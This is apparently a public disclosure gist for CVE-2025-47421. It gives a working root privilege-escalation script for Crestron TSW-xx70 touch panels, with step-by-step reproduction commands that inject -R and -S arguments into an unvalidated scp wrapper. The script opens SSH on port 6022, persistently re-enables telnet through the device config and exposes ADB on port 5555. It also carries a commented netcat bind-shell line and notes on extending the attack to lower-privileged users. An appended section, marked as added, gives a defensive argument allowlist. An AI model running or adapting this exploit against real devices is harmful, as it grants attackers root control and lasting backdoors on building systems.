@KazWolfe
Last active March 23, 2026 00:32
Crestron TSW-xx70 Root Access (v3.002.0031.001 and below)
#!/system/bin/bash
# Shell vulnerability for Crestron TSW-xx70 devices. Requires existing admin permissions!
# This vulnerability was reported to Crestron and assigned CVE-2025-47421.
# It was disclosed in May 2025, and is being publicly released here, in March 2026.
#
# Steps to Reproduce:
# 1. Upload this file to /logs over SCP. Ensure that the execute bit is set.
# 2. Run the following command locally:
#
# ssh crestron@10.0.2.10 -- 'scp -vv -R / -S ./logs/shell.sh x@x:/ /'
#
# 3. Telnet to the device IP, port 4444. You will have a root shell.
#
# Principle of Operation:
# The Crestron sshShell wrapper (at /vendor/bin/sshShell.sh) offers special operation modes for SCP and SFTP for
# administrative purposes. Usually, these commands are somewhat protected through validation and user level checks.
# However, the scp handler's arguments are not validated properly. We can therefore pass in extra command-line
# arguments such as -S to run an arbitrary script. The full breakdown of the scp command listed above specifies:
#
# * -R / : sets the chroot for scp to /, allowing access to the full filesystem (required to run
# processes) and to escape the prior `cp`
# * -S ./logs/shell.sh : Calls `./logs/shell.sh` to act as the executable instead of `sftp`, et al.
# * x@x:/ : A dummy SSH copy source, used to force invocation of the -S command.
# * / : A dummy path to copy the file to. Only used to keep scp happy.
#
# The command as listed in sshShell is:
# new_cmd=`echo "$@" | busybox awk '{print $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 }'`
# [ ... ]
# scp -U $SCP_PARAM $new_cmd
#
# Now, all that remains is to actually create shell.sh. We use the logs folder since it's mounted without `noexec`,
# allowing us to place a binary there for execution. Furthermore, since administrator-level users have permission
# to write to this folder, they can set +x on files placed there.
#
# Since `sshShell` is run as root, this script will _also_ have root access - allowing us to basically do whatever we
# want.
#
# As written, this exploit will only work for administrator users, as -R cannot be re-set once set. Since -R is
# ultimately evaluated before -S is, the process we "jump" to will need to be inside the chroot of the logs directory.
# This exploit may, however, be easily extended to allow Programmer level users to escalate to full admins without much
# additional work. As Programmers have write access to /mnt/sdcard/ftpprog/plog/ramdiskLogs, they are able to place a
# binary and set +x on it, again as root. This means that a Programmer can static compile something like chw00t and use
# it to escape the previously set chroot. Note that this will require omitting the "-R /" argument as well.
#
# IN THEORY, if an Operator can *somehow* get a file into `logs` or `ramdiskLogs`, they'll also be able to use the same
# trick, so long as their command doesn't include a `-t`, which likely isn't going to happen in manual SCP cases.
# Bind shell for xx70 devices. Should use something better, if we can.
# nc -Elp 4444 /system/bin/bash -
# SSH Debug port (6022) for xx70 devices
if [ -f "/vendor/bin/sshd_bash.sh" ]; then
    start sshd_bash
    echo "Native sshd_bash process started. Try connecting to port 6022!" >&2
else
    TZ=/etc/localtime /system/bin/sshd -p 6022
    echo "Didn't find sshd_bash service, started rogue SSHD. Try connecting to port 6022!" >&2
fi
# Patch our rc.conf to enable sshd forever. Only on xx70s, since TELNETPORT=2 is _very_ insecure on
# xx60 devices. This should persist through upgrades, though it has been confirmed to be lost when
# performing a factory reset.
if [ -f "/vendor/bin/sshd_bash.sh" ]; then
    sed -i 's!TELNETPORT="0"!TELNETPORT="2"!g' /data/crestron/config/rc.conf
    backupAndRecover.sh COMPUTEHASH /data/crestron
    echo "Patch-enabled SSH debug port for future restarts." >&2
fi
# ADB enablement (all devices, failsafe in case sshd fails)
setprop service.adb.tcp.port 5555
start adbd
echo "Enabled adbd on port 5555" >&2
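The root cause described under "Principle of Operation" above is that sshShell.sh forwards fields 2..10 of the raw SSH command to scp without checking them. The following is an added example written for this page, not Crestron's code: a POSIX sh allowlist check that such a wrapper could run before handing arguments to scp, rejecting option-looking tokens like -S and -R, remote host:path specs, path traversal, and paths outside an assumed /logs target root. The permitted flag set and the /logs root are assumptions, not the wrapper's real policy.

```shell
#!/bin/sh
# Added hardening example, not Crestron's code: an allowlist a wrapper like the
# page's sshShell.sh could apply before exec'ing scp. The permitted flags and
# the permitted target root (/logs) are assumptions, not the wrapper's policy.
ALLOWED_ROOT="/logs"

# validate_scp_args WORD... -> 0 if every word is an allowlisted scp flag or a
# path inside $ALLOWED_ROOT; 1 (reason on stderr) at the first offending word.
validate_scp_args() {
    for word in "$@"; do
        case "$word" in
            -t|-f|-r|-p|-d|-v|-vv)
                ;;                                # mode/verbosity flags only
            -*)
                # -S (program to run), -R (chroot), -o, -i and any other
                # option change what scp executes or where it is rooted
                echo "rejected option: $word" >&2; return 1 ;;
            *:*)
                echo "rejected remote spec: $word" >&2; return 1 ;;
            ..|../*|*/..|*/../*)
                echo "rejected path traversal: $word" >&2; return 1 ;;
            "$ALLOWED_ROOT"|"$ALLOWED_ROOT"/*)
                ;;                                # path inside the permitted tree
            *)
                echo "rejected path outside $ALLOWED_ROOT: $word" >&2; return 1 ;;
        esac
    done
    return 0
}

# check_ssh_scp_command "scp ..." -> split the raw command on whitespace and
# drop the leading "scp", mirroring the page's awk '{print $2 ... $10}', then
# validate the remainder. Globbing is off so a literal "*" is not expanded.
check_ssh_scp_command() {
    case "$1" in
        scp\ *) ;;
        *) echo "not an scp command" >&2; return 1 ;;
    esac
    set -f
    set -- $1
    set +f
    shift
    validate_scp_args "$@"
}

# Constructed inputs: a routine admin upload into /logs, and the page's exploit line.
GOOD_CMD='scp -t /logs'
BAD_CMD='scp -vv -R / -S ./logs/shell.sh x@x:/ /'
for cmd in "$GOOD_CMD" "$BAD_CMD"; do
    check_ssh_scp_command "$cmd" && echo "ALLOW: $cmd" || echo "DENY:  $cmd"
done
```

Running it prints ALLOW for the routine upload and DENY for the exploit line, which is refused at the -R token before -S is ever reached.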